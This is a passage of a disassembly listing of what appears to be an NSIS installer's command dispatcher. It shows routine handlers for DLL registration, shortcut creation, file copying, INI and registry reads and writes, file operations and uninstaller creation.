jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push eax
push esi
push 0
push [ebp+var_14]
call sub_40747E
test eax, eax
jz short loc_402498
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+arg_0]
push eax
push offset asc_408558 ; "\\"
push [ebp+var_18]
call sub_407478
test eax, eax
jz short loc_402498
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
push edi
call sub_405F5B
mov eax, [ebp+arg_0]
push dword ptr [eax+0Ch]
push ebx
call sub_405F5B
and [ebp+var_4], 0
loc_402498: ; CODE XREF: sub_401610+E51�j
; sub_401610+E6A�j
push [ebp+var_18]
jmp loc_4031CC
; ---------------------------------------------------------------------------
loc_4024A0: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor edi, edi ; jumptable 0040166B case 42
inc edi
push 8001h
mov [ebp+var_4], edi
call ds:dword_40806C ; SetErrorMode
cmp dword_426490, 0
jl loc_4025E9
push 0FFFFFFF0h
pop esi
call sub_401508
mov esi, edi
mov [ebp+arg_0], eax
call sub_401508
cmp [ebp+var_28], 0
mov [ebp+var_8], eax
jz short loc_4024E9
push [ebp+arg_0]
call ds:dword_408068 ; GetModuleHandleA
test eax, eax
mov [ebp+var_C], eax
jnz short loc_40253E
loc_4024E9: ; CODE XREF: sub_401610+EC7�j
mov esi, ds:dword_408064
xor edi, edi
push edi
push edi
lea eax, [ebp+var_14]
push eax
push 400h
call esi ; RtlGetLastWin32Error
mov ebx, ds:dword_408060
push eax
push edi
mov edi, 1300h
push edi
call ebx ; FormatMessageA
push [ebp+arg_0]
push 0FFFFFFF6h
call sub_40509F
push [ebp+var_14]
push [ebp+arg_0]
push offset aRegdllCouldNot ; "RegDLL: Could not load '%s' -> '%s'"
call sub_40614C
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_4080C0 ; LoadLibraryA
test eax, eax
mov [ebp+var_C], eax
jz short loc_4025B8
xor edi, edi
inc edi
loc_40253E: ; CODE XREF: sub_401610+ED7�j
push [ebp+var_8]
push [ebp+var_C]
call ds:dword_40812C ; GetProcAddress
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jz short loc_40258B
cmp [ebp+var_30], ebx
mov [ebp+var_4], ebx
jz short loc_40256D
push [ebp+var_30]
call sub_4014E1
call esi ; RtlGetLastWin32Error
test eax, eax
jz short loc_4025A8
mov [ebp+var_4], edi
jmp short loc_4025A8
; ---------------------------------------------------------------------------
loc_40256D: ; CODE XREF: sub_401610+F48�j
push offset off_40A000
push offset dword_40A480
push offset dword_427000
push 400h
push [ebp+var_10]
call esi ; RtlGetLastWin32Error
add esp, 14h
jmp short loc_4025A8
; ---------------------------------------------------------------------------
loc_40258B: ; CODE XREF: sub_401610+F40�j
push [ebp+var_8]
push 0FFFFFFF7h
call sub_40509F
push [ebp+arg_0]
push [ebp+var_8]
push offset aErrorRegisteri ; "Error registering DLL: %s not found in "...
call sub_40614C
add esp, 0Ch
loc_4025A8: ; CODE XREF: sub_401610+F56�j
; sub_401610+F5B�j ...
cmp [ebp+var_2C], ebx
jnz short loc_4025FB
push [ebp+var_C]
call ds:dword_408130 ; FreeLibrary
jmp short loc_4025FB
; ---------------------------------------------------------------------------
loc_4025B8: ; CODE XREF: sub_401610+F29�j
push 0
push 0
lea eax, [ebp+var_14]
push eax
push 400h
call esi ; RtlGetLastWin32Error
push eax
push 0
push edi
call ebx ; FormatMessageA
push 0FFFFFFF6h
call sub_4014E1
push [ebp+var_14]
push [ebp+arg_0]
push offset aErrorRegiste_0 ; "Error registering DLL: Could not load '"...
call sub_40614C
add esp, 0Ch
jmp short loc_4025FB
; ---------------------------------------------------------------------------
loc_4025E9: ; CODE XREF: sub_401610+EA8�j
push 0FFFFFFE7h
call sub_4014E1
push offset aErrorRegiste_1 ; "Error registering DLL: Could not initia"...
call sub_40614C
pop ecx
loc_4025FB: ; CODE XREF: sub_401610+F9B�j
; sub_401610+FA6�j ...
push 0
call ds:dword_40806C ; SetErrorMode
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402608: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 0FFFFFFF0h ; jumptable 0040166B case 43
pop esi
call sub_401508
push 0FFFFFFDFh
pop esi
mov [ebp+var_8], eax
call sub_401508
push 2
pop esi
mov edi, eax
call sub_401508
push 0FFFFFFCDh
pop esi
mov [ebp+var_40], eax
call sub_401508
push 45h
pop esi
mov [ebp+var_18], eax
call sub_401508
push edi
mov [ebp+var_14], eax
call sub_405DE6
test eax, eax
jnz short loc_402650
push 21h
pop esi
call sub_401508
loc_402650: ; CODE XREF: sub_401610+1036�j
mov eax, [ebp+var_28]
mov ecx, eax
sar ecx, 10h
push ecx
movzx ecx, ah
push ecx
mov esi, 0FFh
and eax, esi
push eax
push [ebp+var_18]
push [ebp+var_40]
push edi
push [ebp+var_8]
push offset aCreateshortcut ; "CreateShortCut: out: \"%s\", in: \"%s %s\","...
call sub_40614C
add esp, 20h
lea eax, [ebp+arg_0]
push eax
push offset dword_408DDC
push 1
push 0
push offset dword_408DEC
call ds:dword_408298
test eax, eax
jl loc_40276F
mov eax, [ebp+arg_0]
mov ecx, [eax]
lea edx, [ebp+var_C]
push edx
push offset dword_408DFC
push eax
call dword ptr [ecx]
mov ebx, eax
test ebx, ebx
jl loc_402762
mov eax, [ebp+arg_0]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+50h]
mov ebx, eax
mov eax, [ebp+arg_0]
mov ecx, [eax]
push offset dword_42C800
push eax
call dword ptr [ecx+24h]
mov ecx, [ebp+var_28]
mov eax, ecx
sar eax, 8
and eax, esi
jz short loc_4026EA
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push eax
push ecx
call dword ptr [edx+3Ch]
mov ecx, [ebp+var_28]
loc_4026EA: ; CODE XREF: sub_401610+10CB�j
mov eax, [ebp+arg_0]
mov edx, [eax]
sar ecx, 10h
push ecx
push eax
call dword ptr [edx+34h]
mov ecx, [ebp+var_18]
cmp byte ptr [ecx], 0
jz short loc_40270F
mov edi, [ebp+var_28]
mov eax, [ebp+arg_0]
mov edx, [eax]
and edi, esi
push edi
push ecx
push eax
call dword ptr [edx+44h]
loc_40270F: ; CODE XREF: sub_401610+10ED�j
mov eax, [ebp+arg_0]
push [ebp+var_40]
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
mov eax, [ebp+arg_0]
push [ebp+var_14]
mov ecx, [eax]
push eax
call dword ptr [ecx+1Ch]
xor eax, eax
cmp ebx, eax
jl short loc_402759
push 400h
mov esi, offset word_40B888
push esi
push 0FFFFFFFFh
push [ebp+var_8]
mov word_40B888, ax
push eax
push eax
call ds:dword_408134 ; MultiByteToWideChar
mov eax, [ebp+var_C]
mov ecx, [eax]
push 1
push esi
push eax
call dword ptr [ecx+18h]
mov ebx, eax
loc_402759: ; CODE XREF: sub_401610+111B�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_402762: ; CODE XREF: sub_401610+10A1�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
test ebx, ebx
jge short loc_40277A
loc_40276F: ; CODE XREF: sub_401610+1086�j
mov [ebp+var_4], 1
push 0FFFFFFF0h
jmp short loc_40277C
; ---------------------------------------------------------------------------
loc_40277A: ; CODE XREF: sub_401610+115D�j
push 0FFFFFFF4h
loc_40277C: ; CODE XREF: sub_401610+289�j
; sub_401610+33C�j ...
call sub_4014E1
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402786: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 44
call sub_401508
push 11h
pop esi
mov ebx, eax
call sub_401508
mov esi, eax
push esi
push ebx
push offset aCopyfilesSS ; "CopyFiles \"%s\"->\"%s\""
call sub_40614C
mov eax, [ebp+var_10]
add esp, 0Ch
push ebx
mov [ebp+var_60], eax
mov [ebp+var_5C], 2
call sub_406003 ; lstrlen
push esi
mov byte ptr [eax+ebx+1], 0
call sub_406003 ; lstrlen
push 0FFFFFFF8h
mov edi, offset dword_40AC88
push edi
mov byte ptr [eax+esi+1], 0
call sub_4065B7
push esi
push edi
call ds:dword_4080A4 ; lstrcat
mov ax, word ptr [ebp+var_30]
push edi
push 0
mov [ebp+var_58], ebx
mov [ebp+var_54], esi
mov [ebp+var_48+2], edi
mov [ebp+var_50], ax
call sub_40509F
lea eax, [ebp+var_60]
push eax
call ds:dword_408174
test eax, eax
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push 0
push 0FFFFFFF9h
call sub_40509F
jmp loc_401A40
; ---------------------------------------------------------------------------
loc_402819: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
cmp esi, 0BADF00Dh ; jumptable 0040166B case 45
jz short loc_402835
loc_402821: ; CODE XREF: sub_401610+9A8�j
push 200010h
push 0FFFFFFE8h
push 0
call sub_4065B7
push eax
jmp loc_401D29
; ---------------------------------------------------------------------------
loc_402835: ; CODE XREF: sub_401610+120F�j
inc dword_426474
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402840: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 46
push offset aRm ; "<RM>"
mov ebx, offset byte_40A888
push ebx
mov [ebp+var_40], esi
mov [ebp+var_18], esi
mov [ebp+arg_0], esi
call sub_405FFD ; lstrcpy
push ebx
mov edi, offset dword_40AC88
push edi
call sub_405FFD ; lstrcpy
cmp [ebp+var_38], esi
jz short loc_402874
call sub_401508
mov [ebp+var_40], eax
loc_402874: ; CODE XREF: sub_401610+125A�j
cmp [ebp+var_34], 0
jz short loc_402885
push 11h
pop esi
call sub_401508
mov [ebp+var_18], eax
loc_402885: ; CODE XREF: sub_401610+1268�j
cmp [ebp+var_28], 0
jz short loc_402896
push 22h
pop esi
call sub_401508
mov [ebp+arg_0], eax
loc_402896: ; CODE XREF: sub_401610+1279�j
push 0FFFFFFCDh
pop esi
call sub_401508
mov esi, eax
push esi
push edi
push ebx
push offset dword_40A488
push offset aWriteinistrWro ; "WriteINIStr: wrote [%s] %s=%s in %s"
call sub_40614C
add esp, 14h
push esi
push [ebp+arg_0]
push [ebp+var_18]
push [ebp+var_40]
call ds:dword_408138 ; WritePrivateProfileStringA
jmp loc_401A38
; ---------------------------------------------------------------------------
loc_4028CA: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 47
inc esi
mov [ebp+arg_0], 7E4E21h
call sub_401508
push 12h
pop esi
mov ebx, eax
call sub_401508
push 0FFFFFFDDh
pop esi
mov [ebp+var_14], eax
call sub_401508
push eax
push 3FFh
push edi
lea eax, [ebp+arg_0]
push eax
push [ebp+var_14]
push ebx
call ds:dword_408140 ; GetPrivateProfileStringA
mov eax, [edi]
cmp eax, [ebp+arg_0]
jmp loc_401A14
; ---------------------------------------------------------------------------
loc_40290D: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
cmp [ebp+var_28], 0 ; jumptable 0040166B case 48
jnz short loc_402957
push 2
call sub_4015C7
mov edi, eax
test edi, edi
jz loc_401A40
push 33h
pop esi
call sub_401508
mov esi, eax
push esi
push edi
call ds:dword_408010 ; RegDeleteValueA
push esi
push offset dword_40AC88
push [ebp+var_34]
mov ebx, eax
push offset aDeleteregvalue ; "DeleteRegValue: %d\\%s\\%s"
call sub_40614C
add esp, 10h
push edi
call ds:dword_408020 ; RegCloseKey
jmp short loc_402993
; ---------------------------------------------------------------------------
loc_402957: ; CODE XREF: sub_401610+1301�j
push 22h
pop esi
call sub_401508
mov esi, eax
push esi
push [ebp+var_34]
push offset aDeleteregkeyDS ; "DeleteRegKey: %d\\%s"
call sub_40614C
mov eax, [ebp+var_34]
add esp, 0Ch
test eax, eax
jnz short loc_402983
mov eax, dword_426464
add eax, 80000001h
loc_402983: ; CODE XREF: sub_401610+1367�j
mov ecx, [ebp+var_28]
and ecx, 2
push ecx
push esi
push eax
call sub_401540
mov ebx, eax
loc_402993: ; CODE XREF: sub_401610+1345�j
test ebx, ebx
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
jmp loc_401A40
; ---------------------------------------------------------------------------
loc_4029A0: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ebx, ebx ; jumptable 0040166B case 49
cmp esi, ebx
jz short loc_4029AB
mov [ebp+arg_0], esi
jmp short loc_4029B8
; ---------------------------------------------------------------------------
loc_4029AB: ; CODE XREF: sub_401610+1394�j
mov eax, dword_426464
add eax, 80000001h
mov [ebp+arg_0], eax
loc_4029B8: ; CODE XREF: sub_401610+1399�j
mov eax, [ebp+var_28]
mov [ebp+var_8], eax
mov eax, [ebp+var_24]
push 2
pop esi
mov [ebp+var_14], eax
call sub_401508
push 11h
pop esi
mov [ebp+var_C], eax
call sub_401508
push ebx
lea ecx, [ebp+var_18]
push ecx
push ebx
push 2
push ebx
push ebx
push ebx
push eax
push [ebp+arg_0]
mov [ebp+var_10], eax
mov [ebp+var_4], 1
call ds:dword_408014 ; RegCreateKeyExA
test eax, eax
jnz loc_402AAF
xor esi, esi
cmp [ebp+var_8], 1
mov edi, offset dword_40AC88
jnz short loc_402A33
push 23h
pop esi
call sub_401508
push edi
call sub_406003 ; lstrlen
push edi
push [ebp+var_C]
mov esi, eax
push [ebp+var_10]
inc esi
push [ebp+arg_0]
push offset aWriteregstrSet ; "WriteRegStr: set %d\\%s\\%s to %s"
call sub_40614C
add esp, 14h
loc_402A33: ; CODE XREF: sub_401610+13F9�j
cmp [ebp+var_8], 4
jnz short loc_402A60
push 3
pop ecx
call sub_4014F2
push 4
pop esi
push eax
push [ebp+var_C]
mov dword_40AC88, eax
push [ebp+var_10]
push [ebp+arg_0]
push offset aWriteregdwordS ; "WriteRegDWORD: set %d\\%s\\%s to %d"
call sub_40614C
add esp, 14h
loc_402A60: ; CODE XREF: sub_401610+1427�j
cmp [ebp+var_8], 3
jnz short loc_402A8E
push 0C00h
push edi
push ebx
push [ebp+var_2C]
call sub_40362B
mov esi, eax
push esi
push [ebp+var_C]
push [ebp+var_10]
push [ebp+arg_0]
push offset aWriteregbinSet ; "WriteRegBin: set %d\\%s\\%s with %d bytes"...
call sub_40614C
add esp, 14h
loc_402A8E: ; CODE XREF: sub_401610+1454�j
push esi
push edi
push [ebp+var_14]
push ebx
push [ebp+var_C]
push [ebp+var_18]
call ds:dword_408018 ; RegSetValueExA
test eax, eax
jnz short loc_402AA7
mov [ebp+var_4], ebx
loc_402AA7: ; CODE XREF: sub_401610+1492�j
push [ebp+var_18]
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_402AAF: ; CODE XREF: sub_401610+13E8�j
push [ebp+var_10]
push [ebp+arg_0]
push offset aWriteregErrorC ; "WriteReg: error creating key %d\\%s"
call sub_40614C
loc_402ABF: ; CODE XREF: sub_401610+978�j
add esp, 0Ch
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402AC7: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 20019h ; jumptable 0040166B case 50
call sub_4015C7
push 33h
pop esi
mov ebx, eax
call sub_401508
xor esi, esi
cmp ebx, esi
mov byte ptr [edi], 0
jz loc_401A40
lea ecx, [ebp+var_14]
push ecx
push edi
lea ecx, [ebp+arg_0]
push ecx
push esi
push eax
push ebx
mov [ebp+var_14], 400h
call ds:dword_40801C ; RegQueryValueExA
xor ecx, ecx
inc ecx
test eax, eax
jnz short loc_402B36
cmp [ebp+arg_0], 4
jz short loc_402B20
cmp [ebp+arg_0], ecx
jz short loc_402B19
cmp [ebp+arg_0], 2
jnz short loc_402B36
loc_402B19: ; CODE XREF: sub_401610+1501�j
cmp [ebp+var_28], esi
jz short loc_402B3C
jmp short loc_402B39
; ---------------------------------------------------------------------------
loc_402B20: ; CODE XREF: sub_401610+14FC�j
cmp [ebp+var_28], esi
jnz short loc_402B2C
mov [ebp+var_4], 1
loc_402B2C: ; CODE XREF: sub_401610+1513�j
push dword ptr [edi]
push edi
call sub_405F5B
jmp short loc_402B3C
; ---------------------------------------------------------------------------
loc_402B36: ; CODE XREF: sub_401610+14F6�j
; sub_401610+1507�j
mov byte ptr [edi], 0
loc_402B39: ; CODE XREF: sub_401610+150E�j
mov [ebp+var_4], ecx
loc_402B3C: ; CODE XREF: sub_401610+150C�j
; sub_401610+1524�j
push ebx
jmp short loc_402B92
; ---------------------------------------------------------------------------
loc_402B3F: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 20019h ; jumptable 0040166B case 51
call sub_4015C7
push 3
pop ecx
mov esi, eax
call sub_4014F2
xor edx, edx
cmp esi, edx
mov byte ptr [edi], 0
jz loc_401A40
cmp [ebp+var_28], edx
mov ecx, 3FFh
mov [ebp+arg_0], ecx
jz short loc_402B79
push ecx
push edi
push eax
push esi
call ds:dword_408004 ; RegEnumKeyA
jmp short loc_402B8A
; ---------------------------------------------------------------------------
loc_402B79: ; CODE XREF: sub_401610+155B�j
push edx
push edx
push edx
push edx
lea ecx, [ebp+arg_0]
push ecx
push edi
push eax
push esi
call ds:dword_40800C ; RegEnumValueA
loc_402B8A: ; CODE XREF: sub_401610+1567�j
mov byte ptr [edi+3FFh], 0
push esi
loc_402B92: ; CODE XREF: sub_401610+149A�j
; sub_401610+152D�j
call ds:dword_408020 ; RegCloseKey
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402B9D: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
cmp byte ptr [edi], 0 ; jumptable 0040166B case 52
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push edi
call sub_405F74
push eax
loc_402BAD: ; CODE XREF: sub_401610+DBA�j
call ds:dword_408084 ; CloseHandle
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402BB8: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 0FFFFFFEDh ; jumptable 0040166B case 53
pop esi
call sub_401508
push [ebp+var_30]
push [ebp+var_34]
push eax
call sub_405E7A
cmp eax, 0FFFFFFFFh
jnz loc_401DBD
loc_402BD5: ; CODE XREF: sub_401610+1777�j
mov byte ptr [edi], 0
jmp loc_401A40
; ---------------------------------------------------------------------------
loc_402BDD: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
cmp [ebp+var_30], 0 ; jumptable 0040166B case 54
jz short loc_402BF5
xor ecx, ecx
inc ecx
call sub_4014F2
mov byte_40A888, al
xor eax, eax
inc eax
jmp short loc_402C03
; ---------------------------------------------------------------------------
loc_402BF5: ; CODE XREF: sub_401610+15D1�j
push 11h
pop esi
call sub_401508
push eax
call sub_406003 ; lstrlen
loc_402C03: ; CODE XREF: sub_401610+15E3�j
cmp byte ptr [edi], 0
jz loc_401A40
push 0
lea ecx, [ebp+arg_0]
push ecx
push eax
push offset byte_40A888
push edi
call sub_405F74
push eax
call ds:dword_408144 ; WriteFile
jmp loc_401A38
; ---------------------------------------------------------------------------
loc_402C2A: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 2 ; jumptable 0040166B case 55
pop ecx
xor esi, esi
call sub_4014F2
cmp eax, 1
mov [ebp+var_8], eax
jl loc_4031D2 ; default
; jumptable 0040166B cases 64,65
mov ecx, 3FFh
cmp eax, ecx
jle short loc_402C4C
mov [ebp+var_8], ecx
loc_402C4C: ; CODE XREF: sub_401610+1637�j
cmp byte ptr [edi], 0
jz loc_402CDE
push edi
mov byte ptr [ebp+arg_0+3], 0
call sub_405F74
cmp [ebp+var_8], 0
mov edi, eax
jle short loc_402CDE
loc_402C67: ; CODE XREF: sub_401610+1697�j
push 0
lea eax, [ebp+var_14]
push eax
push 1
lea eax, [ebp+var_19]
push eax
push edi
call ds:dword_408148 ; ReadFile
test eax, eax
jz short loc_402CDE
cmp [ebp+var_14], 1
jnz short loc_402CDE
cmp [ebp+var_2C], 0
jnz short loc_402CAB
cmp byte ptr [ebp+arg_0+3], 0Dh
jz short loc_402CBB
cmp byte ptr [ebp+arg_0+3], 0Ah
jz short loc_402CBB
mov al, [ebp+var_19]
mov [esi+ebx], al
inc esi
test al, al
mov byte ptr [ebp+arg_0+3], al
jz short loc_402CDE
cmp esi, [ebp+var_8]
jl short loc_402C67
jmp short loc_402CDE
; ---------------------------------------------------------------------------
loc_402CAB: ; CODE XREF: sub_401610+1678�j
movzx eax, [ebp+var_19]
push eax
push ebx
call sub_405F5B
jmp loc_4031DB
; ---------------------------------------------------------------------------
loc_402CBB: ; CODE XREF: sub_401610+167E�j
; sub_401610+1684�j
mov al, [ebp+var_19]
cmp byte ptr [ebp+arg_0+3], al
jz short loc_402CD1
cmp al, 0Dh
jz short loc_402CCB
cmp al, 0Ah
jnz short loc_402CD1
loc_402CCB: ; CODE XREF: sub_401610+16B5�j
mov [esi+ebx], al
inc esi
jmp short loc_402CDE
; ---------------------------------------------------------------------------
loc_402CD1: ; CODE XREF: sub_401610+16B1�j
; sub_401610+16B9�j
push 1
push 0
push 0FFFFFFFFh
push edi
call ds:dword_40814C ; SetFilePointer
loc_402CDE: ; CODE XREF: sub_401610+163F�j
; sub_401610+1655�j ...
mov byte ptr [esi+ebx], 0
test esi, esi
jmp loc_401A3A
; ---------------------------------------------------------------------------
loc_402CE9: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
cmp byte ptr [edi], 0 ; jumptable 0040166B case 56
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push [ebp+var_2C]
push 0
push 2
pop ecx
call sub_4014F2
push eax
push edi
call sub_405F74
push eax
call ds:dword_40814C ; SetFilePointer
cmp [ebp+var_34], 0
jl loc_4031D2 ; default
; jumptable 0040166B cases 64,65
jmp loc_403166
; ---------------------------------------------------------------------------
loc_402D1C: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
cmp byte ptr [edi], 0 ; jumptable 0040166B case 57
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push edi
call sub_405F74
push eax
call ds:dword_408150 ; FindClose
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
cmp byte ptr [ebx], 0 ; jumptable 0040166B case 58
jz loc_401A1A
lea eax, [ebp+var_1A4]
push eax
push ebx
call sub_405F74
push eax
call ds:dword_408154 ; FindNextFileA
test eax, eax
jz loc_401A1A
loc_402D5C: ; CODE XREF: sub_401610+1783�j
lea eax, [ebp+var_178]
push eax
push edi
jmp loc_4030E5
; ---------------------------------------------------------------------------
loc_402D69: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 2 ; jumptable 0040166B case 59
pop esi
call sub_401508
lea ecx, [ebp+var_1A4]
push ecx
push eax
call ds:dword_408158 ; FindFirstFileA
cmp eax, 0FFFFFFFFh
jnz short loc_402D8C
mov byte ptr [ebx], 0
jmp loc_402BD5
; ---------------------------------------------------------------------------
loc_402D8C: ; CODE XREF: sub_401610+1772�j
push eax
push ebx
call sub_405F5B
jmp short loc_402D5C
; ---------------------------------------------------------------------------
loc_402D95: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 60
mov [ebp+var_40], 0FFFFFD66h
call sub_401508
and [ebp+var_18], esi
test byte ptr dword_426444+1, 4
mov edi, ds:dword_4080A4
mov [ebp+arg_0], eax
jz loc_402E63
push eax
call sub_406003 ; lstrlen
push dword_4201B0
mov esi, eax
call sub_406003 ; lstrlen
lea ecx, [eax+esi+1]
mov eax, 105h
cmp ecx, eax
jb short loc_402DEB
push dword_4201B0
call sub_406003 ; lstrlen
lea eax, [eax+esi+1]
loc_402DEB: ; CODE XREF: sub_401610+17CA�j
push eax
call sub_405DBB
mov ebx, eax
test ebx, ebx
mov [ebp+var_C], ebx
jz short loc_402E4D
push dword_4201B0
push ebx
call sub_405FFD ; lstrcpy
push 5Ch
push [ebp+arg_0]
call sub_4061D3
test eax, eax
jz short loc_402E18
inc eax
push eax
jmp short loc_402E1B
; ---------------------------------------------------------------------------
loc_402E18: ; CODE XREF: sub_401610+1802�j
push [ebp+arg_0]
loc_402E1B: ; CODE XREF: sub_401610+1806�j
push ebx
call edi ; lstrcat
push ebx
call sub_406003 ; lstrlen
lea esi, [eax+ebx-1]
jmp short loc_402E39
; ---------------------------------------------------------------------------
loc_402E2A: ; CODE XREF: sub_401610+182E�j
cmp byte ptr [esi], 5Ch
jz short loc_402E40
push esi
push ebx
call ds:dword_40822C ; CharPrevA
mov esi, eax
loc_402E39: ; CODE XREF: sub_401610+1818�j
cmp esi, ebx
mov [ebp+var_18], esi
ja short loc_402E2A
loc_402E40: ; CODE XREF: sub_401610+181D�j
push ebx
mov byte ptr [esi], 0
call sub_406301
test eax, eax
jnz short loc_402E57
loc_402E4D: ; CODE XREF: sub_401610+94�j
; sub_401610+A3�j ...
mov eax, 7FFFFFFFh
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_402E57: ; CODE XREF: sub_401610+183B�j
push ebx
push [ebp+arg_0]
mov byte ptr [esi], 5Ch
call sub_405FFD ; lstrcpy
loc_402E63: ; CODE XREF: sub_401610+17A6�j
push [ebp+arg_0]
call sub_405DE6
test eax, eax
push [ebp+arg_0]
mov ebx, offset byte_40A888
jz short loc_402E7F
push ebx
call sub_405FFD ; lstrcpy
jmp short loc_402E93
; ---------------------------------------------------------------------------
loc_402E7F: ; CODE XREF: sub_401610+1865�j
push offset byte_42C400
push ebx
call sub_405FFD ; lstrcpy
push eax
call sub_4061A6
push eax
call edi ; lstrcat
loc_402E93: ; CODE XREF: sub_401610+186D�j
push ebx
call sub_406009
push 2
push 40000000h
push ebx
call sub_405E7A
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz loc_402F5E
mov eax, dword_426448
push eax
mov [ebp+var_14], eax
call sub_405DBB
test eax, eax
mov [ebp+var_10], eax
jz loc_402F55
push 0
call sub_403409
push [ebp+var_14]
push [ebp+var_10]
call sub_4033D7
push [ebp+var_30]
call sub_405DBB
mov esi, eax
test esi, esi
mov [ebp+var_40], esi
jz short loc_402F27
push [ebp+var_30]
push esi
push 0
push [ebp+var_34]
call sub_40362B
jmp short loc_402F19
; ---------------------------------------------------------------------------
loc_402EFE: ; CODE XREF: sub_401610+190C�j
mov ecx, [esi]
mov eax, [esi+4]
push ecx
mov [ebp+var_4C], ecx
mov ecx, [ebp+var_10]
add esi, 8
push esi
add eax, ecx
push eax
call sub_405E5A
add esi, [ebp+var_4C]
loc_402F19: ; CODE XREF: sub_401610+18EC�j
cmp byte ptr [esi], 0
jnz short loc_402EFE
push [ebp+var_40]
call ds:dword_40813C ; GlobalFree
loc_402F27: ; CODE XREF: sub_401610+18DC�j
xor esi, esi
push esi
lea eax, [ebp+var_64]
push eax
push [ebp+var_14]
push [ebp+var_10]
push [ebp+var_8]
call ds:dword_408144 ; WriteFile
push [ebp+var_10]
call ds:dword_40813C ; GlobalFree
push esi
push esi
push [ebp+var_8]
push 0FFFFFFFFh
call sub_40362B
mov [ebp+var_40], eax
loc_402F55: ; CODE XREF: sub_401610+18B5�j
push [ebp+var_8]
call ds:dword_408084 ; CloseHandle
loc_402F5E: ; CODE XREF: sub_401610+189C�j
push ebx
push [ebp+var_40]
push offset aCreatedUninsta ; "created uninstaller: %d, \"%s\""
call sub_40614C
add esp, 0Ch
cmp [ebp+var_40], 0
push 0FFFFFFF3h
pop esi
jge short loc_402F89
push 0FFFFFFEFh
pop esi
push ebx
call ds:dword_408128 ; DeleteFileA
mov [ebp+var_4], 1
loc_402F89: ; CODE XREF: sub_401610+1966�j
push esi
call sub_4014E1
test byte ptr dword_426444+1, 4
jz loc_4031C3
mov eax, [ebp+var_18]
mov esi, [ebp+arg_0]
push offset asc_408330 ; " /x \""
push esi
mov byte ptr [eax], 0
call edi ; lstrcat
push dword_4201B0
push esi
call edi ; lstrcat
push offset a_? ; "\" _?="
push esi
call edi ; lstrcat
push [ebp+var_C]
push esi
call edi ; lstrcat
push [ebp+var_C]
push esi
call sub_405D01
test eax, eax
mov [ebp+arg_0], eax
push esi
jz short loc_40304A
push offset aFileExtraction ; "File Extraction: success (\"%s\")"
call sub_40614C
mov edi, ds:dword_408074
pop ecx
pop ecx
push 64h
push [ebp+arg_0]
call edi ; WaitForSingleObject
mov esi, 102h
cmp eax, esi
jnz short loc_403026
mov ebx, ds:dword_408254
jmp short loc_403009
; ---------------------------------------------------------------------------
loc_402FFF: ; CODE XREF: sub_401610+1A09�j
lea eax, [ebp+var_60]
push eax
call ds:dword_408258 ; DispatchMessageA
loc_403009: ; CODE XREF: sub_401610+19ED�j
; sub_401610+1A14�j
push 1
push 0Fh
push 0Fh
lea eax, [ebp+var_60]
push 0
push eax
call ebx ; PeekMessageA
test eax, eax
jnz short loc_402FFF
push 64h
push [ebp+arg_0]
call edi ; WaitForSingleObject
cmp eax, esi
jz short loc_403009
loc_403026: ; CODE XREF: sub_401610+19E5�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call ds:dword_408070 ; GetExitCodeProcess
cmp [ebp+var_14], 0
jz short loc_40303C
inc [ebp+var_4]
loc_40303C: ; CODE XREF: sub_401610+1A27�j
